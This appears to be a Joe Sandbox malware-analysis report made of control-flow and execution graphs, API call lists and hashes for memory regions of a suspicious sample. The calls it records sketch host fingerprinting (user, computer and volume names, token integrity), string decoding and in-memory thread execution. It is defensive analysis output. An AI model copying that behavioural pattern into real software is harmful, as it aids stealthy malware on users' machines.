                                                                                                                                                                                                                                      control_flow_graph 334 cd5b42-cd5b47 call cd5d90 336 cd5b4c-cd5b52 334->336 338 cd5b0d 336->338 339 cd5c42-cd5c62 call cf1280 336->339 338->339 340 cd5b13 338->340 356 cd5c14-cd5cc0 339->356 357 cd5c26 339->357 342 cd5c8f-cd5c96 340->342 344 cd5c29 342->344 345 cd5c98-cd5c9a 342->345 347 cd5c2f-cd5c36 344->347 348 cd5cc2-cd5cc9 call cd52a0 344->348 346 cd5c9c 345->346 354 cd5d0e-cd5d18 346->354 355 cd5bfa 346->355 347->348 352 cd5c3c 347->352 364 cd5c69 348->364 365 cd5ccb 348->365 352->334 360 cd5d1a 354->360 361 cd5d54 354->361 355->354 359 cd5c00 355->359 356->348 357->356 363 cd5c28 357->363 359->356 368 cd5d4b-cd5d52 360->368 363->344 366 cd5c6f 364->366 367 cd5b68-cd5d75 364->367 365->346 369 cd5ccd 365->369 366->367 370 cd5c75 366->370 368->361 371 cd5d45-cd5d47 368->371 369->346 372 cd5ccf-cd5ce4 CreateThread 369->372 370->342 374 cd5d5f 371->374 375 cd5d49 371->375 377 cd5cea 372->377 378 cd5c01-cd5c05 372->378 380 cd5d65 374->380 375->368 375->374 377->378 379 cd5cf0-cd5cf6 377->379 382 cd5c20-cd5c68 378->382 385 cd5d37-cd5d41 378->385 379->382 380->380 385->368 386 cd5d43 385->386 386->361
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                                                                                      • Instruction ID: c20e83633843fcb0a31c162fc4cef536a8cec69b3c9000f513e85b0f070ff017
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4121F43022CF448FCB699B1D844873576E2EBDD351F2801AB8367CF3E6CA248E449322

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 387 cd5b09-cd5d01 392 cd5bb4-cd5ce4 CreateThread 387->392 393 cd5d07 387->393 397 cd5cea 392->397 398 cd5c01-cd5c05 392->398 393->392 395 cd5d0d 393->395 397->398 399 cd5cf0-cd5cf6 397->399 401 cd5c20-cd5c68 398->401 404 cd5d37-cd5d41 398->404 399->401 405 cd5d4b-cd5d52 404->405 406 cd5d43 404->406 407 cd5d45-cd5d47 405->407 408 cd5d54 405->408 406->408 409 cd5d5f 407->409 410 cd5d49 407->410 411 cd5d65 409->411 410->405 410->409 411->411
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                                      • Instruction ID: 4e88c4713c2cd36903f32c0fee0c93f3fb019d73d4d61aa20cc8d46cadabe776
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B301683011DF468FDB6547258D183397BD1EB99334F2401ABC693CA3D5DF604B00A722

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 412 cd5b87-cd5d01 CreateThread 416 cd5bb4-cd5ce4 CreateThread 412->416 417 cd5d07 412->417 421 cd5cea 416->421 422 cd5c01-cd5c05 416->422 417->416 419 cd5d0d 417->419 421->422 423 cd5cf0-cd5cf6 421->423 425 cd5c20-cd5c68 422->425 428 cd5d37-cd5d41 422->428 423->425 429 cd5d4b-cd5d52 428->429 430 cd5d43 428->430 431 cd5d45-cd5d47 429->431 432 cd5d54 429->432 430->432 433 cd5d5f 431->433 434 cd5d49 431->434 435 cd5d65 433->435 434->429 434->433 435->435
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                                      • Instruction ID: 29308cba0010ff05afc7eb91fde416d709ba18a99fdddfe3cec8188e793709ad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99E0863061DB444FDB599B2458107297AE5EB88314F1501CFC54ADB2D1CB790A054782

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 436 cd599b-cd599e 437 cd59b8 call cf0df0 436->437 438 cd59f7 436->438 442 cd59bd-cd59c2 call cd5d90 437->442 439 cd5a02 438->439 443 cd597d 439->443 444 cd59d4 439->444 449 cd59c7-cd59ce 442->449 443->444 446 cd597f-cd5981 443->446 447 cd59d8 444->447 448 cd593b-cd5a15 call cf11a0 444->448 450 cd5983-cd5a38 446->450 456 cd59d9-cd59de call d02190 447->456 452 cd5a1a-cd5a26 449->452 453 cd59d0 449->453 460 cd5a3e 450->460 461 cd5994-cd599c 450->461 457 cd5a2c-cd5a34 452->457 458 cd59a1-cd59b5 call cd5e10 452->458 453->452 459 cd59d2-cd59de 453->459 456->461 470 cd59e0 456->470 457->456 458->437 469 cd5a08-cd5a0b 458->469 459->461 459->470 460->457 461->439 465 cd599e 461->465 465->438 469->461 472 cd5a0d 469->472 470->461 471 cd59e2-cd59ec 470->471 473 cd59ee-cd59ef 471->473 474 cd5a62-cd5a6e 471->474 479 cd5991 472->479 480 cd5932 472->480 473->450 476 cd59f1 call d09970 473->476 477 cd5a75-cd5ab3 call cf1280 474->477 478 cd5a70 474->478 476->437 490 cd5abb-cd5ac9 477->490 491 cd5ab5 477->491 478->477 482 cd5a72 478->482 479->480 484 cd5993 479->484 482->477 484->461 493 cd5af2-cd5af5 490->493 491->490 492 cd5ab7-cd5ab9 491->492 492->490 497 cd5adb-cd5adc 493->497 498 cd5ad5 493->498 500 cd5a45-cd5a46 497->500 501 cd5ae2 497->501 498->497 499 cd5ad7-cd5ad9 498->499 499->497 501->500 502 cd5ae8 501->502 502->493
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                                      • Instruction ID: a3405fb1751612f1157b230ef9d6a781932da13e742da688a7d76786448759ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD01497090DF90CFD717DB1940613796652F754330F28015BA34ECB392C9344F02A752

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 503 cd8090-cd8096 504 cd8184 503->504 505 cd818c-cd8192 504->505 506 cd8186 CloseHandle 504->506 507 cd8115-cd8118 505->507 508 cd8194 505->508 506->505 509 cd8119-cd811a 507->509 510 cd80a7 507->510 508->507 511 cd819a 508->511 509->510 512 cd811c 509->512 513 cd813c 511->513 514 cd820f 512->514 513->504 515 cd808e-cd8096 514->515 516 cd8215-cd821e 514->516 515->504 515->510 516->515 518 cd8224 516->518 519 cd81d7-cd81e6 call d0715c 518->519 520 cd8226 518->520 529 cd8089 519->529 530 cd80ca-cd810f GetTokenInformation 519->530 520->519 521 cd8228-cd82ee call cd5d90 520->521 532 cd830c-cd831e 521->532 533 cd82f0 521->533 529->530 535 cd808b 529->535 536 cd812d 530->536 537 cd8111 530->537 539 cd82a1-cd82ba call cd5d90 call cdec00 532->539 540 cd8320 532->540 533->532 538 cd82f2 533->538 547 cd808c 535->547 544 cd80a8 536->544 545 cd8133 536->545 537->536 541 cd8113 537->541 542 cd82f7-cd82fc call cd5d90 538->542 539->540 540->542 546 cd8322 540->546 541->507 562 cd8253-cd8265 call cf1280 542->562 563 cd8302 542->563 548 cd80aa-cd80ad 544->548 545->513 551 cd81ed-cd81f0 545->551 546->542 552 cd8324-cd8326 546->552 547->515 553 cd8163-cd8170 call d07164 548->553 554 cd80b3-cd8203 548->554 555 cd80da-cd80f1 551->555 556 cd81f6 551->556 559 cd8328 552->559 553->506 575 cd8172 553->575 554->553 570 cd8209 554->570 555->548 556->555 561 cd81fc 556->561 572 cd82df-cd832b 559->572 573 cd8335 559->573 568 cd81fe-cd8201 GetTokenInformation 561->568 562->559 583 cd826b 562->583 563->562 569 cd8308-cd830a 563->569 568->514 588 cd81b7 568->588 569->532 572->573 580 cd832d-cd8331 572->580 576 cd826e-cd8285 573->576 575->505 581 cd829b-cd829d 576->581 582 cd8287 576->582 580->573 581->539 586 cd824c 582->586 583->576 587 cd8239 583->587 586->581 589 cd824e-cd8252 586->589 587->559 590 cd823f-cd8243 587->590 588->514 591 cd81b9-cd81ca 588->591 589->576 590->542 590->586 594 cd81d0 591->594 595 cd80f3 591->595 594->568 600 cd80c3 594->600 595->547 596 cd80f5 595->596 596->547 601 cd8077 596->601 600->568 602 cd80c9 600->602 601->519 602->530
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                                      • Instruction ID: 777a05c7c737e50f6aa2a78cc3b4d2c1d03c3fc73b8594db4e3364e53eb5af10
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42C08C6012CC02B7523802490C0B0FC66209202790B4C00078F2A80320DD048F0F0097

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 603 cd817f 604 cd8184 603->604 605 cd818c-cd8192 604->605 606 cd8186 CloseHandle 604->606 607 cd8115-cd8118 605->607 608 cd8194 605->608 606->605 609 cd8119-cd811a 607->609 610 cd80a7 607->610 608->607 611 cd819a 608->611 609->610 612 cd811c 609->612 613 cd813c 611->613 614 cd820f 612->614 613->604 615 cd808e-cd8096 614->615 616 cd8215-cd821e 614->616 615->604 615->610 616->615 618 cd8224 616->618 619 cd81d7-cd81e6 call d0715c 618->619 620 cd8226 618->620 629 cd8089 619->629 630 cd80ca-cd810f GetTokenInformation 619->630 620->619 621 cd8228-cd82ee call cd5d90 620->621 632 cd830c-cd831e 621->632 633 cd82f0 621->633 629->630 635 cd808b 629->635 636 cd812d 630->636 637 cd8111 630->637 639 cd82a1-cd82ba call cd5d90 call cdec00 632->639 640 cd8320 632->640 633->632 638 cd82f2 633->638 647 cd808c 635->647 644 cd80a8 636->644 645 cd8133 636->645 637->636 641 cd8113 637->641 642 cd82f7-cd82fc call cd5d90 638->642 639->640 640->642 646 cd8322 640->646 641->607 662 cd8253-cd8265 call cf1280 642->662 663 cd8302 642->663 648 cd80aa-cd80ad 644->648 645->613 651 cd81ed-cd81f0 645->651 646->642 652 cd8324-cd8326 646->652 647->615 653 cd8163-cd8170 call d07164 648->653 654 cd80b3-cd8203 648->654 655 cd80da-cd80f1 651->655 656 cd81f6 651->656 659 cd8328 652->659 653->606 675 cd8172 653->675 654->653 670 cd8209 654->670 655->648 656->655 661 cd81fc 656->661 672 cd82df-cd832b 659->672 673 cd8335 659->673 668 cd81fe-cd8201 GetTokenInformation 661->668 662->659 683 cd826b 662->683 663->662 669 cd8308-cd830a 663->669 668->614 688 cd81b7 668->688 669->632 672->673 680 cd832d-cd8331 672->680 676 cd826e-cd8285 673->676 675->605 681 cd829b-cd829d 676->681 682 cd8287 676->682 680->673 681->639 686 cd824c 682->686 683->676 687 cd8239 683->687 686->681 689 cd824e-cd8252 686->689 687->659 690 cd823f-cd8243 687->690 688->614 691 cd81b9-cd81ca 688->691 689->676 690->642 690->686 694 cd81d0 691->694 695 cd80f3 691->695 694->668 700 cd80c3 694->700 695->647 696 cd80f5 695->696 696->647 701 cd8077 696->701 700->668 702 cd80c9 700->702 701->619 702->630
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000001B.00000002.1842395380.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_27_2_cd0000_maintenanceservice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                                      • Instruction ID: 3dc8fd7770f5edc2f34371dde0228f5563fc9f541b929d54e364e8c3a231475e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECC092A055C909A7513826892C0A0BD75605613BA0F0C4513EF2A8A360DD584F4F41A2

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:2.1%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                                      Total number of Nodes:96
                                                                                                                                                                                                                                      Total number of Limit Nodes:9
                                                                                                                                                                                                                                      execution_graph 22472 1085a3b 22473 1084f7c 22472->22473 22474 1085a45 22472->22474 22475 1085a4b CreateThread 22474->22475 22476 10851ae 22474->22476 22477 1085a59 RtlExitUserThread 22475->22477 22479 1085b17 22477->22479 22482 1085d20 22479->22482 22481 1085b3c 22483 1085d22 22482->22483 22483->22481 22484 1085d39 VirtualAlloc 22483->22484 22485 1085d46 22483->22485 22487 1085d5d VirtualFree 22483->22487 22484->22483 22487->22481 22488 3680890 22489 36808b1 22488->22489 22490 368097a 22489->22490 22494 3681838 22489->22494 22497 36850d4 22489->22497 22500 3683bf3 22489->22500 22503 3689080 22494->22503 22511 3689240 22497->22511 22502 3689080 VirtualProtect 22500->22502 22501 3683c12 22502->22501 22505 3689093 22503->22505 22507 3689130 22505->22507 22508 3689178 VirtualProtect 22507->22508 22510 3681851 22508->22510 22514 3689260 22511->22514 22516 3689270 22514->22516 22518 3689308 22516->22518 22519 3689348 CloseHandle 22518->22519 22521 36850da 22519->22521 22522 1084b70 GetUserDefaultUILanguage 22523 1084b82 22522->22523 22523->22523 22524 1088431 22525 1088439 22524->22525 22534 108829d 22524->22534 22526 10882ef GetTokenInformation 22526->22534 22527 1088376 GetTokenInformation 22528 1088380 GetLastError 22527->22528 22527->22534 22529 1088386 OpenProcessToken 22528->22529 22530 10883d3 GetSidSubAuthorityCount 22530->22534 22531 1087e76 CryptStringToBinaryA 22536 1087e89 22531->22536 22532 108839e CloseHandle 22532->22534 22534->22526 22534->22527 22534->22529 22534->22530 22534->22531 22534->22532 22541 1085d90 22534->22541 22543 1091e6c 22534->22543 22535 1087f06 CryptStringToBinaryA 22535->22536 22536->22535 22538 1085df0 22536->22538 22536->22541 22537 1086084 SetFilePointerEx 22537->22538 22538->22537 22538->22541 22542 1085d20 2 API calls 22542->22543 22543->22541 22543->22542 22544 109d050 VirtualFree SetFilePointerEx SetFilePointerEx SetFilePointerEx 22543->22544 22545 109d050 VirtualAlloc VirtualFree SetFilePointerEx SetFilePointerEx SetFilePointerEx 22543->22545 22544->22543 22545->22543 22546 10a8550 22563 10a8556 22546->22563 22547 10a8145 GetLastError 22574 10a7e2e 22547->22574 22548 10a8bc1 GetLastError 22548->22563 22549 10a83fb GetUserNameW 22549->22574 22550 10a8209 GetUserNameW 22550->22574 22575 10a7d37 22550->22575 22551 10a8986 SetEntriesInAclW 22551->22563 22552 10a890b LocalFree 22552->22563 22553 10a89cd OpenMutexW 22554 10a8248 22557 10a824a GetLastError 22554->22557 22556 10a8288 22556->22575 22576 1090d80 SetFilePointerEx 22556->22576 22558 10a7d6c GetVolumeInformationW 22559 10a7d30 22559->22558 22559->22575 22560 10a836e GetLastError 22560->22574 22562 10a7fd4 GetLastError 22562->22574 22563->22546 22563->22547 22563->22548 22563->22551 22563->22552 22563->22553 22563->22559 22565 10a8599 22563->22565 22566 10a7d20 22563->22566 22570 10a896a wsprintfW 22563->22570 22571 10a8953 AllocateAndInitializeSid 22563->22571 22563->22574 22563->22575 22564 10a8296 22564->22566 22568 10a851e 22564->22568 22565->22559 22565->22570 22566->22558 22566->22559 22567 10a7d83 GetWindowsDirectoryW 22566->22567 22566->22575 22567->22566 22567->22575 22577 1090d80 SetFilePointerEx 22568->22577 22570->22559 22571->22563 22572 10a8528 22573 10a7f6b GetVolumeInformationW 22573->22574 22574->22547 22574->22549 22574->22550 22574->22554 22574->22556 22574->22557 22574->22558 22574->22559 22574->22560 22574->22562 22574->22566 22574->22568 22574->22573 22574->22575 22576->22564 22577->22572 22578 10a7df0 22579 10a8288 22578->22579 22580 10a7e00 22578->22580 22592 1090d80 SetFilePointerEx 22579->22592 22580->22579 22582 10a7e06 GetComputerNameW 22580->22582 22591 10a7d37 22582->22591 22583 10a8296 22584 10a851e 22583->22584 22589 10a7d20 22583->22589 22593 1090d80 SetFilePointerEx 22584->22593 22586 10a8528 22587 10a7d30 22588 10a7d6c GetVolumeInformationW 22587->22588 22587->22591 22589->22587 22589->22588 22590 10a7d83 GetWindowsDirectoryW 22589->22590 22589->22591 22590->22589 22590->22591 22592->22583 22593->22586
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 0108838F
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0108839F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleOpenProcessToken
                                                                                                                                                                                                                                      • String ID: $AQu
                                                                                                                                                                                                                                      • API String ID: 3879341014-1472930311
                                                                                                                                                                                                                                      • Opcode ID: 7067344d3bf986901a25e954f76ee28bf139396c4a8120b538f5080a1f4db62f
                                                                                                                                                                                                                                      • Instruction ID: b8114707ec306de4bae7e500f16462505abf2235294dbb97e91ee20f3ba9e96f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7067344d3bf986901a25e954f76ee28bf139396c4a8120b538f5080a1f4db62f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6B26530A0C381AFDFB7BB1C88649357FE16B42224F5E82DAD6C54F1A7D6279806D352
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(010CA17C), ref: 010A7FD4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                      • Opcode ID: 522051d62ee642a7b684c400252f708cf0c29b27df55c5c84b54ed8f841d4e93
                                                                                                                                                                                                                                      • Instruction ID: 59e337e9d021c35a12e456b850a36dbeaa5002649da64462150340ef7182d2d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 522051d62ee642a7b684c400252f708cf0c29b27df55c5c84b54ed8f841d4e93
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2021822A483409EEBF757EC4C08B753FE86B51663FCCC6DBE7D18A0E7E16658048252

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1317 10a7df0-10a7dfa 1318 10a8288-10a829a call 1090d80 1317->1318 1319 10a7e00 1317->1319 1325 10a851e-10a852d call 1090d80 1318->1325 1326 10a82a0 1318->1326 1319->1318 1321 10a7e06-10a7e15 GetComputerNameW 1319->1321 1323 10a7e1b 1321->1323 1324 10a82b6-10a82bb 1321->1324 1323->1324 1327 10a7e21-10a7e2d 1323->1327 1326->1325 1329 10a82a6 1326->1329 1332 10a7dbc-10a7dce 1329->1332 1333 10a82ac 1329->1333 1339 10a7d6c-10a7d80 GetVolumeInformationW 1332->1339 1340 10a7d35 1332->1340 1335 10a82b2-10a82b4 1333->1335 1336 10a7d20-10a7d2b 1333->1336 1335->1324 1337 10a7d2d 1336->1337 1338 10a7d61-10a7d68 1336->1338 1341 10a7d94 1337->1341 1343 10a7d6a 1338->1343 1344 10a7de5-10a7dea 1338->1344 1340->1339 1342 10a7d37-10a7d39 1340->1342 1341->1338 1348 10a7d96 1341->1348 1347 10a7d3b-10a7d46 1342->1347 1343->1339 1343->1344 1345 10a7dec 1344->1345 1346 10a7d83-10a7d8c GetWindowsDirectoryW 1344->1346 1345->1346 1350 10a7dee 1345->1350 1346->1347 1349 10a7d8e 1346->1349 1351 10a7d48 1347->1351 1352 10a7d97-10a7d98 1347->1352 1353 10a7dac 1348->1353 1349->1341 1354 10a7da4-10a7da6 1349->1354 1350->1327 1351->1353 1355 10a7d9a-10a7d9f 1352->1355 1356 10a7de2 1352->1356 1353->1352 1357 10a7dae-10a7db3 1353->1357 1354->1332 1358 10a7da8 1354->1358 1358->1332 1359 10a7daa 1358->1359 1359->1353 1360 10a7db8-10a7dba 1359->1360 1360->1332
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                                                                                      • Opcode ID: 314f0c626a187939f474e3669c709ea06291aadb2be75d0d7a95243de56531f6
                                                                                                                                                                                                                                      • Instruction ID: 82aa724957ad88ec457c9eae47af06d4c7a4fc094b1e6f958f9dbeae3e80046c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 314f0c626a187939f474e3669c709ea06291aadb2be75d0d7a95243de56531f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA21D6336493446FE6B676DD9C09BB93EB82B91710FC5C4CAFAC85A192E167240482E3

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1430 1085a3b-1085a3f 1431 1084f7c-1084f91 1430->1431 1432 1085a45 1430->1432 1434 1085a4b-1085a53 CreateThread 1432->1434 1435 10851ae-10851d6 1432->1435 1437 1085a59-1085b51 RtlExitUserThread call 1085d20 1434->1437
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,010855C0,?,00000000,00000000), ref: 01085A51
                                                                                                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 01085B11
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.1983376643.0000000001084000.00000040.00001000.00020000.00000000.sdmp, Offset: 01084000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_1084000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$CreateExitUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4108186749-0
                                                                                                                                                                                                                                      • Opcode ID: 425e56990a2c6a516e945ce07f5c706bfdc4bc562f962ebc24e1b6b2dcc60b19
                                                                                                                                                                                                                                      • Instruction ID: d6f6778a23ce535ccc250c2d6d32179f886a7bce9115f3247800f897e9e588c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 425e56990a2c6a516e945ce07f5c706bfdc4bc562f962ebc24e1b6b2dcc60b19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89112A2454D3C24EEBA3AB6C8C2836ABFE01FA3524F1D01DAD1C08E1A3D259450D8BA3

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1531 3689130-36891b1 VirtualProtect 1534 36891ba-36891df 1531->1534 1535 36891b3-36891b9 1531->1535 1535->1534
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 036891A4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000022.00000002.2025883157.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_34_2_3680000_zeXKjViL.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                      • Opcode ID: 8cc859a9555a5104aac0c7a051bcb49323ae4ec357e3593164df2fd316c5d685
                                                                                                                                                                                                                                      • Instruction ID: 12c1fe909417cfc25c8f3fcc0940da7ca58df0eac3996b5dcb0550f4ebb2e29b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cc859a9555a5104aac0c7a051bcb49323ae4ec357e3593164df2fd316c5d685
